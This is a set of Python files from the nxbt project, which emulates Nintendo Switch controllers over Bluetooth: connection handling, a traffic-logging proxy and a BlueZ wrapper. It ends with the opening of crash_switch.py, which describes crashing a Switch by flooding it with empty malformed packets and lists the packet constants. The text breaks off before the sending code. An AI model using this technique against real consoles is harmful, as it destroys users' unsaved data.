else: # Respond at 120Hz for Pro Controller # or 60Hz for Joy-Cons. # Sleep timers are compensated with the elapsed command # processing time. if self.controller_type == ControllerTypes.PRO_CONTROLLER: if elapsed_time < 1/120: time.sleep(1/120 - elapsed_time) else: if elapsed_time < 1/60: time.sleep(1/60 - elapsed_time) def save_connection(self, error, state=None): while self.reconnect_counter < 2: try: self.logger.debug("Attempting to reconnect") # Reinitialize the protocol self.protocol = ControllerProtocol( self.controller_type, self.bt.address, colour_body=self.colour_body, colour_buttons=self.colour_buttons) if self.lock: self.lock.acquire() try: itr, ctrl = self.reconnect(self.switch_address) return itr, ctrl finally: if self.lock: self.lock.release() except OSError: self.reconnect_counter += 1 self.logger.exception(error) time.sleep(0.5) # If we can't reconnect, transition to attempting # to connect to any Switch. self.logger.debug("Connecting to any Switch") self.reconnect_counter = 0 # Reinitialize the protocol self.protocol = ControllerProtocol( self.controller_type, self.bt.address, colour_body=self.colour_body, colour_buttons=self.colour_buttons) self.input.reassign_protocol(self.protocol) # Since we were forced to attempt a reconnection # we need to press the L/SL and R/SR buttons before # we can proceed with any input. 
if self.controller_type == ControllerTypes.PRO_CONTROLLER: self.input.current_macro_commands = "L R 0.0s".strip(" ").split(" ") elif self.controller_type == ControllerTypes.JOYCON_L: self.input.current_macro_commands = "JCL_SL JCL_SR 0.0s".strip(" ").split(" ") elif self.controller_type == ControllerTypes.JOYCON_R: self.input.current_macro_commands = "JCR_SL JCR_SR 0.0s".strip(" ").split(" ") if self.lock: self.lock.acquire() try: itr, ctrl = self.connect() finally: if self.lock: self.lock.release() self.state["state"] = "connected" self.switch_address = itr.getsockname()[0] return itr, ctrl def connect(self): """Configures as a specified controller, pairs with a Nintendo Switch, and creates/accepts sockets for communication with the Switch. """ self.state["state"] = "connecting" # Creating control and interrupt sockets s_ctrl = socket.socket( family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) s_itr = socket.socket( family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) # Setting up HID interrupt/control sockets try: s_ctrl.bind((self.bt.address, 17)) s_itr.bind((self.bt.address, 19)) except OSError: s_ctrl.bind((socket.BDADDR_ANY, 17)) s_itr.bind((socket.BDADDR_ANY, 19)) s_itr.listen(1) s_ctrl.listen(1) self.bt.set_discoverable(True) ctrl, ctrl_address = s_ctrl.accept() itr, itr_address = s_itr.accept() # Send an empty input report to the Switch to prompt a reply self.protocol.process_commands(None) msg = self.protocol.get_report() itr.sendall(msg) # Setting interrupt connection as non-blocking. # In this case, non-blocking means it throws a "BlockingIOError" # for sending and receiving, instead of blocking. 
fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK) # Mainloop while True: # Attempt to get output from Switch try: reply = itr.recv(50) if self.logger_level <= logging.DEBUG and len(reply) > 40: self.logger.debug(format_msg_switch(reply)) except BlockingIOError: reply = None self.protocol.process_commands(reply) msg = self.protocol.get_report() if self.logger_level <= logging.DEBUG and reply: self.logger.debug(format_msg_controller(msg)) try: itr.sendall(msg) except BlockingIOError: continue # Exit pairing loop when player lights have been set and # vibration has been enabled if (reply and len(reply) > 45 and self.protocol.vibration_enabled and self.protocol.player_number): break # Switch responds to packets slower during pairing # Pairing cycle responds optimally on a 15Hz loop time.sleep(1/15) self.slow_input_frequency = True self.input.exited_grip_order_menu = False return itr, ctrl def reconnect(self, reconnect_address): """Attempts to reconnect with a Switch at the given address. :param reconnect_address: The Bluetooth MAC address of the Switch :type reconnect_address: string or list """ def recreate_sockets(): # Creating control and interrupt sockets ctrl = socket.socket( family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) itr = socket.socket( family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) return itr, ctrl self.state["state"] = "reconnecting" itr = None ctrl = None if type(reconnect_address) == list: for address in reconnect_address: test_itr, test_ctrl = recreate_sockets() try: # Setting up HID interrupt/control sockets test_ctrl.connect((address, 17)) test_itr.connect((address, 19)) itr = test_itr ctrl = test_ctrl except OSError: test_itr.close() test_ctrl.close() pass elif type(reconnect_address) == str: test_itr, test_ctrl = recreate_sockets() # Setting up HID interrupt/control sockets test_ctrl.connect((reconnect_address, 17)) test_itr.connect((reconnect_address, 19)) itr = test_itr ctrl = 
test_ctrl if not itr and not ctrl: raise OSError("Unable to reconnect to sockets at the given address(es)", reconnect_address) fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK) # Send an empty input report to the Switch to prompt a reply self.protocol.process_commands(None) msg = self.protocol.get_report() itr.sendall(msg) # Setting interrupt connection as non-blocking # In this case, non-blocking means it throws a "BlockingIOError" # for sending and receiving, instead of blocking fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK) return itr, ctrl
Yamakaky/nxbt
scripts/reconnect_proxy.py
<reponame>Yamakaky/nxbt """ This is a quick and dirty script for recording input from a controller and dumping it into a "messages.txt" file. You'll need to input the device's Bluetooth MAC address manually and specify the type of controller before this script works. Note: If you get an Invalid Exchange error when running this script, this means that the Switch has paired to the controller, invalidating the original pairing key we created. You'll need to remove the controller before continuing. """ import socket import sys import os import time import fcntl from time import perf_counter from nxbt import toggle_input_plugin from nxbt import BlueZ from nxbt import Controller from nxbt import JOYCON_L, JOYCON_R, PRO_CONTROLLER JCL_REPLY02 = b'\xA2\x21\x05\x8E\x84\x00\x12\x01\x18\x80\x01\x18\x80\x80\x82\x02\x03\x48\x01\x02\xDC\xA6\x32\x16\x4A\x7C\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' PRO_REPLY02 = b'\xA2\x21\x1A\x40\x00\x00\x00\x02\x20\x00\x01\x00\x00\x00\x82\x02\x03\x48\x03\x02\xDC\xA6\x32\x16\x4A\x7C\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' JCR_REPLY02 = b'\xA2\x21\x05\x8E\x84\x00\x12\x01\x18\x80\x01\x18\x80\x80\x82\x02\x03\x48\x02\x02\xDC\xA6\x32\x16\x4A\x7C\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' def format_message(data, split, name): """Formats a given byte message in hex format split into payload and subcommand sections. 
:param data: A series of bytes :type data: bytes :param split: The location of the payload/subcommand split :type split: integer :param name: The name featured in the start/end messages :type name: string :return: The formatted data :rtype: string """ payload = "" subcommand = "" for i in range(0, len(data)): data_byte = str(hex(data[i]))[2:].upper() if len(data_byte) < 2: data_byte = "0" + data_byte if i <= split: payload += "0x" + data_byte + " " else: subcommand += "0x" + data_byte + " " formatted = ( f"--- {name} Msg ---\n" + f"Payload: {payload}\n" + f"Subcommand: {subcommand}") return formatted def print_msg_controller(data): """Prints a formatted message from a controller :param data: The bytes from the controller message :type data: bytes """ print(format_message(data, 13, "Controller")) def print_msg_switch(data): """Prints a formatted message from a Switch :param data: The bytes from the Switch message :type data: bytes """ print(format_message(data, 10, "Switch")) def write_to_buffer(buffer, message, message_type): formatted_message = None if message_type == "switch": formatted_message = format_message(message, 10, "Switch") elif message_type == "controller": formatted_message = format_message(message, 13, "Controller") elif message_type == "comment": formatted_message = "### " + message + " ###" else: raise ValueError("Unspecified or wrong message type") buffer.append(formatted_message) if __name__ == "__main__": # Switch Controller Bluetooth MAC Address goes here jc_MAC = "98:B6:E9:B0:05:E7" switch_MAC = "7C:BB:8A:D9:91:5A" # Specify the type of controller here controller_type = PRO_CONTROLLER if controller_type == JOYCON_L: REPLY = JCL_REPLY02 elif controller_type == JOYCON_R: REPLY = JCR_REPLY02 else: REPLY = PRO_REPLY02 port_ctrl = 17 port_itr = 19 message_buffer = [] toggle_input_plugin(False) bt = BlueZ(adapter_path="/org/bluez/hci0") controller = Controller(bt, controller_type) # Joy-Con Sockets jc_ctrl = socket.socket(family=socket.AF_BLUETOOTH, 
type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) jc_itr = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) # Switch sockets switch_itr = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) switch_ctrl = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) try: switch_ctrl.bind((bt.address, port_ctrl)) switch_itr.bind((bt.address, port_itr)) # bt.set_alias("Joy-Con (L)") bt.set_alias("Pro Controller") bt.set_discoverable(True) print("Waiting for Switch to connect...") switch_itr.listen(1) switch_ctrl.listen(1) client_control, control_address = switch_ctrl.accept() print("Got Switch Control Client Connection") client_interrupt, interrupt_address = switch_itr.accept() print("Got Switch Interrupt Client Connection") bt.set_alias("Nintendo Switch") print("Connecting to Joy-Con: ", jc_MAC) jc_ctrl.bind((socket.BDADDR_ANY, port_ctrl)) jc_itr.bind((socket.BDADDR_ANY, port_itr)) jc_ctrl.listen(1) jc_itr.listen(1) jc_client_ctrl, _ = jc_ctrl.accept() jc_client_itr, _ = jc_itr.accept() print("Got connection.") # Creating a non-blocking client interrupt connection fcntl.fcntl(client_interrupt, fcntl.F_SETFL, os.O_NONBLOCK) # Initial Input report from Joy-Con jc_data = jc_client_itr.recv(350) print("Got initial Joy-Con Empty Report") # print_msg_controller(jc_data) write_to_buffer( message_buffer, "Joy-Con Empty Report", "comment") write_to_buffer(message_buffer, jc_data, "controller") print(message_buffer) # Send the input report to the Switch a couple times for i in range(3): print("Sending input report", i) client_interrupt.sendall(jc_data) time.sleep(1) # Get the Switch's reply and send it to the Joy-Con reply = client_interrupt.recv(350) # print_msg_switch(reply) write_to_buffer( message_buffer, "Switch Input Report Reply", "comment") write_to_buffer(message_buffer, reply, "switch") jc_client_itr.sendall(reply) # Sending Switch 
the proxy's device info if controller_type == JOYCON_R: client_interrupt.sendall(REPLY) elif controller_type == JOYCON_L: client_interrupt.sendall(REPLY) elif controller_type == PRO_CONTROLLER: client_interrupt.sendall(REPLY) # Waste some cycles here until we get the controllers info. # We don't want to proxy the device's info to the Switch # since it includes a MAC address. print("Waiting on Joy-Con Device Info") while True: jc_data = jc_client_itr.recv(350) if jc_data[1] == 0x21: print("Got Device Info") # print_msg_controller(jc_data) print("Joy-Con Device Info Reply Length", len(jc_data)) write_to_buffer( message_buffer, "Joy-Con Device Info", "comment") write_to_buffer(message_buffer, jc_data, "controller") break # Main loop print("Entering main proxy loop") write_to_buffer( message_buffer, "Entering Main Loop", "comment") time_old = perf_counter() timer_old = 0 timer_counter = 0 while True: try: reply = client_interrupt.recv(350) # print_msg_switch(reply) write_to_buffer(message_buffer, reply, "switch") except BlockingIOError: reply = None if reply: print("Sending to Controller") jc_client_itr.sendall(reply) jc_data = jc_client_itr.recv(350) timer_new = int(jc_data[2]) if timer_new < timer_old: timer_counter += timer_new - (timer_old - 255) else: timer_counter += timer_new - timer_old timer_old = timer_new # print_msg_controller(jc_data) write_to_buffer(message_buffer, jc_data, "controller") try: client_interrupt.sendall(jc_data) except BlockingIOError: continue time.sleep(1/2) except KeyboardInterrupt: print("Closing sockets") # time_new = perf_counter() # print(f"Total Delta: {(time_new - time_old) * 1000}") # print(f"Timer Counter: {timer_counter}") jc_ctrl.close() jc_itr.close() switch_itr.close() switch_ctrl.close() # Write the buffer with open("messages.txt", "w") as f: f.write("\n".join(message_buffer)) try: sys.exit(1) except SystemExit: os._exit(1) except OSError as e: print("Closing sockets") jc_ctrl.close() jc_itr.close() switch_itr.close() 
switch_ctrl.close() raise e finally: toggle_input_plugin(True)
Yamakaky/nxbt
nxbt/bluez.py
<gh_stars>0 import subprocess import re import os import time import logging import dbus SERVICE_NAME = "org.bluez" BLUEZ_OBJECT_PATH = "/org/bluez" ADAPTER_INTERFACE = SERVICE_NAME + ".Adapter1" PROFILEMANAGER_INTERFACE = SERVICE_NAME + ".ProfileManager1" DEVICE_INTERFACE = SERVICE_NAME + ".Device1" def find_object_path(bus, service_name, interface_name, object_name=None): """Searches for a D-Bus object path that contains a specified interface under a specified service. :param bus: A DBus object used to access the DBus. :type bus: DBus :param service_name: The name of a D-Bus service to search for the object path under. :type service_name: string :param interface_name: The name of a D-Bus interface to search for within objects under the specified service. :type interface_name: string :param object_name: The name or ending of the object path, defaults to None :type object_name: string, optional :return: The D-Bus object path or None, if no matching object can be found :rtype: string """ manager = dbus.Interface( bus.get_object(service_name, "/"), "org.freedesktop.DBus.ObjectManager") # Iterating over objects under the specified service # and searching for the specified interface for path, ifaces in manager.GetManagedObjects().items(): managed_interface = ifaces.get(interface_name) if managed_interface is None: continue # If the object name wasn't specified or it matches # the interface address or the path ending elif (not object_name or object_name == managed_interface["Address"] or path.endswith(object_name)): obj = bus.get_object(service_name, path) return dbus.Interface(obj, interface_name).object_path return None def find_objects(bus, service_name, interface_name): """Searches for D-Bus objects that contain a specified interface under a specified service. :param bus: A DBus object used to access the DBus. :type bus: DBus :param service_name: The name of a D-Bus service to search for the object path under. 
:type service_name: string :param interface_name: The name of a D-Bus interface to search for within objects under the specified service. :type interface_name: string :return: The D-Bus object paths matching the arguments :rtype: array """ manager = dbus.Interface( bus.get_object(service_name, "/"), "org.freedesktop.DBus.ObjectManager") paths = [] # Iterating over objects under the specified service # and searching for the specified interface within them for path, ifaces in manager.GetManagedObjects().items(): managed_interface = ifaces.get(interface_name) if managed_interface is None: continue else: obj = bus.get_object(service_name, path) path = str(dbus.Interface(obj, interface_name).object_path) paths.append(path) return paths def toggle_input_plugin(toggle): """Enables or disables the BlueZ input plugin. Requires root user to be run. The units and Bluetooth service will not be restarted if the input plugin already matches the toggle. :param toggle: A boolean element indicating if the plugin is enabled (True) or disabled (False) :type toggle: boolean :raises PermissionError: If the user is not root :raises Exception: If the units can't be reloaded """ service_path = "/lib/systemd/system/bluetooth.service" service = None with open(service_path, "r") as f: service = f.read() # Find the bluetooth service execution line lines = service.split("\n") for i in range(0, len(lines)): line = lines[i] if line.startswith("ExecStart="): # If we want to ensure the plugin is enabled if toggle: # If input is already enabled if "--noplugin=input" not in line: return lines[i] = re.sub(" --noplugin=input", "", line) else: # If input is already disabled if "--noplugin=input" in line: return # If not, add the flag lines[i] = line + " --noplugin=input" service = "\n".join(lines) with open(service_path, "w") as f: f.write(service) # Reload units result = subprocess.run( ["systemctl", "daemon-reload"], stderr=subprocess.PIPE) cmd_err = result.stderr.decode("utf-8").replace("\n", "") if 
cmd_err != "": raise Exception(cmd_err) # Reload the bluetooth service with input disabled result = subprocess.run( ["systemctl", "restart", "bluetooth"], stderr=subprocess.PIPE) cmd_err = result.stderr.decode("utf-8").replace("\n", "") if cmd_err != "": raise Exception(cmd_err) # Kill a bit of time here to ensure all services have restarted time.sleep(0.5) def find_devices_by_alias(alias): """Finds the Bluetooth addresses of devices that have a specified Bluetooth alias. Aliases are converted to uppercase before comparison as BlueZ usually converts aliases to uppercase. :param address: The Bluetooth MAC address :type address: string :return: The path to the D-Bus object or None :rtype: string or None """ bus = dbus.SystemBus() # Find all connected/paired/discovered devices devices = find_objects( bus, SERVICE_NAME, DEVICE_INTERFACE) addresses = [] for path in devices: # Get the device's address and paired status device_props = dbus.Interface( bus.get_object(SERVICE_NAME, path), "org.freedesktop.DBus.Properties") device_alias = device_props.Get( DEVICE_INTERFACE, "Alias").upper() device_addr = device_props.Get( DEVICE_INTERFACE, "Address").upper() # Check for an address match if device_alias.upper() == alias.upper(): addresses.append(device_addr) bus.close() return addresses class BlueZ(): """Exposes the BlueZ D-Bus API as a Python object. 
""" def __init__(self, adapter_path="/org/bluez/hci0"): self.logger = logging.getLogger('nxbt') self.bus = dbus.SystemBus() self.device_path = adapter_path # If we weren't able to find an adapter with the specified ID, # try to find any usable Bluetooth adapter if self.device_path is None: self.device_path = find_object_path( self.bus, SERVICE_NAME, ADAPTER_INTERFACE) # If we aren't able to find an adapter still if self.device_path is None: raise Exception("Unable to find a bluetooth adapter") # Load the adapter's interface self.logger.debug(f"Using adapter under object path: {self.device_path}") self.device = dbus.Interface( self.bus.get_object( SERVICE_NAME, self.device_path), "org.freedesktop.DBus.Properties") self.device_id = self.device_path.split("/")[-1] # Load the ProfileManager interface self.profile_manager = dbus.Interface(self.bus.get_object( SERVICE_NAME, BLUEZ_OBJECT_PATH), PROFILEMANAGER_INTERFACE) self.adapter = dbus.Interface( self.bus.get_object( SERVICE_NAME, self.device_path), ADAPTER_INTERFACE) @property def address(self): """Gets the Bluetooth MAC address of the Bluetooth adapter. :return: The Bluetooth Adapter's MAC address :rtype: string """ return self.device.Get(ADAPTER_INTERFACE, "Address").upper() @property def name(self): """Gets the name of the Bluetooth adapter. :return: The name of the Bluetooth adapter. :rtype: string """ return self.device.Get(ADAPTER_INTERFACE, "Name") @property def alias(self): """Gets the alias of the Bluetooth adapter. This value is used as the "friendly" name of the adapter when communicating over Bluetooth. :return: The adapter's alias :rtype: string """ return self.device.Get(ADAPTER_INTERFACE, "Alias") def set_alias(self, value): """Asynchronously sets the alias of the Bluetooth adapter. If you wish to check the set value, a time delay is needed before the alias getter is run. 
:param value: The new value to be set as the adapter's alias :type value: string """ self.device.Set(ADAPTER_INTERFACE, "Alias", value) @property def pairable(self): """Gets the pairable status of the Bluetooth adapter. :return: A boolean value representing if the adapter is set as pairable or not :rtype: boolean """ return bool(self.device.Get(ADAPTER_INTERFACE, "Pairable")) def set_pairable(self, value): """Sets the pariable boolean status of the Bluetooth adapter. :param value: A boolean value representing if the adapter is pairable or not. :type value: boolean """ dbus_value = dbus.Boolean(value) self.device.Set(ADAPTER_INTERFACE, "Pairable", dbus_value) @property def pairable_timeout(self): """Gets the timeout time (in seconds) for how long the adapter should remain as pairable. Defaults to 0 (no timeout). :return: The pairable timeout in seconds :rtype: int """ return self.device.Get(ADAPTER_INTERFACE, "PairableTimeout") def set_pairable_timeout(self, value): """Sets the timeout time (in seconds) for the pairable property. :param value: The pairable timeout value in seconds :type value: int """ dbus_value = dbus.UInt32(value) self.device.Set(ADAPTER_INTERFACE, "PairableTimeout", dbus_value) @property def discoverable(self): """Gets the discoverable status of the Bluetooth adapter :return: The boolean status of the discoverable status :rtype: boolean """ return bool(self.device.Get(ADAPTER_INTERFACE, "Discoverable")) def set_discoverable(self, value): """Sets the discoverable boolean status of the Bluetooth adapter. :param value: A boolean value representing if the Bluetooth adapter is discoverable or not. :type value: boolean """ dbus_value = dbus.Boolean(value) self.device.Set(ADAPTER_INTERFACE, "Discoverable", dbus_value) @property def discoverable_timeout(self): """Gets the timeout time (in seconds) for how long the adapter should remain as discoverable. Defaults to 180 (3 minutes). 
:return: The discoverable timeout in seconds :rtype: int """ return self.device.Get(ADAPTER_INTERFACE, "DiscoverableTimeout") def set_discoverable_timeout(self, value): """Sets the discoverable time (in seconds) for the discoverable property. Setting this property to 0 results in an infinite discoverable timeout. :param value: The discoverable timeout value in seconds :type value: int """ dbus_value = dbus.UInt32(value) self.device.Set( ADAPTER_INTERFACE, "DiscoverableTimeout", dbus_value) @property def device_class(self): """Gets the Bluetooth class of the device. This represents what type of device this reporting as (Ex: Gamepad, Headphones, etc). :return: A 32-bit hexadecimal Integer representing the Bluetooth Code for a given device type. :rtype: string """ # This is another hacky bit. We're using hciconfig here instead # of the D-Bus API so that results match the setter. See the # setter for further justification on using hciconfig. result = subprocess.run( ["hciconfig", self.device_id, "class"], stdout=subprocess.PIPE) device_class = result.stdout.decode("utf-8").split("Class: ")[1][0:8] return device_class def set_device_class(self, device_class): """Sets the Bluetooth class of the device. This represents what type of device this reporting as (Ex: Gamepad, Headphones, etc). Note: To work this function *MUST* be run as the super user. An exception is returned if this function is run without elevation. :param device_class: A 32-bit Hexadecimal integer :type device_class: string :raises PermissionError: If user is not root :raises ValueError: If the device class is not length 8 :raises Exception: On inability to set class """ if os.geteuid() != 0: raise PermissionError("The device class must be set as root") if len(device_class) != 8: raise ValueError("Device class must be length 8") # This is a bit of a hack. BlueZ allows you to set this value, however, # a config file needs to filled and the BT daemon restarted. 
This is a # good compromise but requires super user privileges. Not ideal. result = subprocess.run( ["hciconfig", self.device_id, "class", device_class], stderr=subprocess.PIPE) # Checking if there was a problem setting the device class cmd_err = result.stderr.decode("utf-8").replace("\n", "") if cmd_err != "": raise Exception(cmd_err) @property def powered(self): """The powered state of the adapter (on/off) as a boolean value. :return: A boolean representing the powered state of the adapter. :rtype: boolean """ return bool(self.device.Get(ADAPTER_INTERFACE, "Powered")) def set_powered(self, value): """Switches the adapter on or off. :param value: A boolean value switching the adapter on or off :type value: boolean """ dbus_value = dbus.Boolean(value) self.device.Set(ADAPTER_INTERFACE, "Powered", dbus_value) def register_profile(self, profile_path, uuid, opts): """Registers an SDP record on the BlueZ SDP server. Options (non-exhaustive, refer to BlueZ docs for the complete list): - Name: Human readable name of the profile - Role: Specifies precise local role. Either "client" or "servier". - RequireAuthentication: A boolean value indicating if pairing is required before connection. - RequireAuthorization: A boolean value indiciating if authorization is needed before connection. - AutoConnect: A boolean value indicating whether a connection can be forced if a client UUID is present. - ServiceRecord: An XML SDP record as a string. 
        :param profile_path: The path for the SDP record
        :type profile_path: string
        :param uuid: The UUID for the SDP record
        :type uuid: string
        :param opts: The options for the SDP server
        :type opts: dict
        """
        self.profile_manager.RegisterProfile(profile_path, uuid, opts)

    def reset(self):
        """Restarts the Bluetooth Service

        :raises Exception: If the bluetooth service can't be restarted
        """
        result = subprocess.run(
            ["systemctl", "restart", "bluetooth"], stderr=subprocess.PIPE)
        cmd_err = result.stderr.decode("utf-8").replace("\n", "")
        if cmd_err != "":
            raise Exception(cmd_err)

        # Restarting bluetoothd invalidates our existing D-Bus proxies, so
        # re-create them against the fresh service instance.
        self.device = dbus.Interface(
            self.bus.get_object(
                SERVICE_NAME,
                self.device_path),
            "org.freedesktop.DBus.Properties")
        self.profile_manager = dbus.Interface(
            self.bus.get_object(
                SERVICE_NAME,
                BLUEZ_OBJECT_PATH),
            PROFILEMANAGER_INTERFACE)

    def get_discovered_devices(self):
        """Gets a dict of all discovered (or previously discovered
        and connected) devices. The key is the device's dbus object
        path and the values are the device's properties.

        The following is a non-exhaustive list of the properties
        a device dictionary can contain:

        - "Address": The Bluetooth address
        - "Alias": The friendly name of the device
        - "Paired": Whether the device is paired
        - "Connected": Whether the device is presently connected
        - "UUIDs": The services a device provides

        :return: A dictionary of all discovered devices
        :rtype: dictionary
        """
        bluez_objects = dbus.Interface(
            self.bus.get_object(SERVICE_NAME, "/"),
            "org.freedesktop.DBus.ObjectManager")

        devices = {}
        objects = bluez_objects.GetManagedObjects()
        # Keep only managed objects that implement the Device interface;
        # keys are stringified D-Bus object paths.
        for path, interfaces in list(objects.items()):
            if DEVICE_INTERFACE in interfaces:
                devices[str(path)] = interfaces[DEVICE_INTERFACE]

        return devices

    def discover_devices(self, alias=None, timeout=10, callback=None):
        """Runs a device discovery of the timeout length (in seconds)
        on the adapter. If specified, a callback is run, every second,
        and passed an updated list of discovered devices.

        An alias can be specified to filter discovered devices.

        The following is a non-exhaustive list of the properties
        a device dictionary can contain:

        - "Address": The Bluetooth address
        - "Alias": The friendly name of the device
        - "Paired": Whether the device is paired
        - "Connected": Whether the device is presently connected
        - "UUIDs": The services a device provides

        :param alias: The alias of a bluetooth device, defaults to None
        :type alias: string, optional
        :param timeout: The discovery timeout in seconds, defaults to 10
        :type timeout: int, optional
        :param callback: A callback function, defaults to None
        :type callback: function, optional
        :return: A dictionary of discovered devices with the object path
            as the key and the device properties as the dictionary properties
        :rtype: dictionary
        """
        # TODO: Device discovery still needs work. Currently, devices
        # are added as DBus objects while device discovery runs, however,
        # added devices linger after discovery stops. This means a device
        # can become unpairable, still show up on a new discovery session,
        # and throw an error when an attempt is made to pair it. Using DBus
        # signals ("interface added"/"property changed") does not solve
        # this issue.

        # Get all devices that have been previously discovered
        devices = self.get_discovered_devices()

        # Start discovering new devices and loop
        self.adapter.StartDiscovery()
        try:
            for i in range(0, timeout):
                time.sleep(1)
                new_devices = self.get_discovered_devices()
                # Shallowly merging dictionaries. Latter dictionary
                # overrides the former. Requires Python 3.5
                devices = {**devices, **new_devices}
                if callback:
                    callback(devices)
        finally:
            # Always stop discovery, even if the callback raised.
            self.adapter.StopDiscovery()

        # Filter out paired devices or devices that don't
        # match a specified alias.
        # NOTE(review): devices lacking an "Alias" or "Paired" property are
        # always excluded, even when no alias filter was requested — confirm
        # this is intentional.
        filtered_devices = {}
        for key in devices.keys():
            # Filter for devices matching alias, if specified
            if "Alias" not in devices[key].keys():
                continue
            if alias and not alias == devices[key]["Alias"]:
                continue

            # Filter for paired devices
            if "Paired" not in devices[key].keys():
                continue
            if devices[key]["Paired"]:
                continue

            filtered_devices[key] = devices[key]

        return filtered_devices

    def pair_device(self, device_path):
        """Pairs a discovered device at a given DBus object path.

        :param device_path: The D-Bus object path to the device
        :type device_path: string
        """
        device = dbus.Interface(
            self.bus.get_object(
                SERVICE_NAME,
                device_path),
            DEVICE_INTERFACE)
        device.Pair()

    def connect_device(self, device_path):
        """Connects to a device at a given D-Bus object path.

        Connection errors are logged rather than raised.

        :param device_path: The D-Bus object path to the device
        :type device_path: string
        """
        device = dbus.Interface(
            self.bus.get_object(
                SERVICE_NAME,
                device_path),
            DEVICE_INTERFACE)
        try:
            device.Connect()
        except dbus.exceptions.DBusException as e:
            # Best-effort connect: log and continue rather than propagate.
            self.logger.exception(e)

    def remove_device(self, path):
        """Removes a device that's been either discovered,
        paired, connected, etc.

        :param path: The D-Bus path to the object
        :type path: string
        """
        self.adapter.RemoveDevice(
            self.bus.get_object(SERVICE_NAME, path))

    def find_device_by_address(self, address):
        """Finds the D-Bus path to a device that contains the
        specified address.

        :param address: The Bluetooth MAC address
        :type address: string
        :return: The path to the D-Bus object or None
        :rtype: string or None
        """
        # Find all connected/paired/discovered devices
        devices = find_objects(
            self.bus,
            SERVICE_NAME,
            DEVICE_INTERFACE)
        for path in devices:
            # Get the device's address and paired status
            device_props = dbus.Interface(
                self.bus.get_object(SERVICE_NAME, path),
                "org.freedesktop.DBus.Properties")
            device_addr = device_props.Get(
                DEVICE_INTERFACE, "Address").upper()

            # Check for an address match (case-insensitive compare)
            if device_addr != address.upper():
                continue

            return path

        return None
Yamakaky/nxbt
scripts/crash_switch.py
""" --------------------------------------------------- --> THIS SCRIPT WILL CRASH YOUR NINTENDO SWITCH <-- --------------------------------------------------- Any save data or active game state will be lost since this forces a restart. I take no responsibility whatsoever for any lost data or harm caused by this script. RUN THIS AT YOUR OWN RISK! --------------------------------------------------- DIRECTIONS FOR USE --------------------------------------------------- This script was tested with a Raspberry Pi 4B (4GB), Python 3.7.3, and a Nintendo Switch on firmware v10.1.0 1.) Open the "Change Grip/Order" menu on your Nintendo Switch. 2.) Start this script with sudo privileges. 3.) Watch your Switch crash. --------------------------------------------------- HOW DOES THIS WORK? --------------------------------------------------- The Switch protects itself against malformed packets when controllers initially connect. This defensiveness, however, is dropped after a controller successfully connects to the Switch. After a successful connection, we can exploit this by blasting the Switch with malformed (specifically empty) packets. Since the Switch isn't expecting this, we trigger a cascade of errors, resulting in the crash. 
""" import socket import sys import os import time import fcntl from nxbt import toggle_input_plugin from nxbt import BlueZ from nxbt import Controller from nxbt import PRO_CONTROLLER REQUEST_INFO = b'\xA2\x21\x1A\x40\x00\x00\x00\x02\x20\x00\x01\x00\x00\x00\x82\x02\x03\x48\x03\x02\xDC\xA6\x32\x16\x4A\x7C\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_SHIPMENT = b'\xA1\x21\xF2\x40\x00\x00\x00\x10\x18\x76\x44\x97\x73\x0B\x80\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SERIAL_NUMBER = b'\xA1\x21\x00\x40\x00\x00\x00\x12\x08\x76\x42\x77\x73\x0C\x90\x10\x00\x60\x00\x00\x10\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' COLOURS = b'\xA1\x21\x26\x40\x00\x00\x00\x11\xF8\x75\x44\x87\x73\x0C\x90\x10\x50\x60\x00\x00\x0D\x32\x32\x32\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' INPUT_MODE = b'\xA1\x21\x5B\x40\x00\x00\x00\x10\x18\x76\x45\x87\x73\x0C\x80\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' TRIGGER_BUTTONS = b'\xA1\x21\xAA\x40\x00\x00\x00\x11\x08\x76\x44\x87\x73\x0B\x83\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FACTORY_PARAMS = 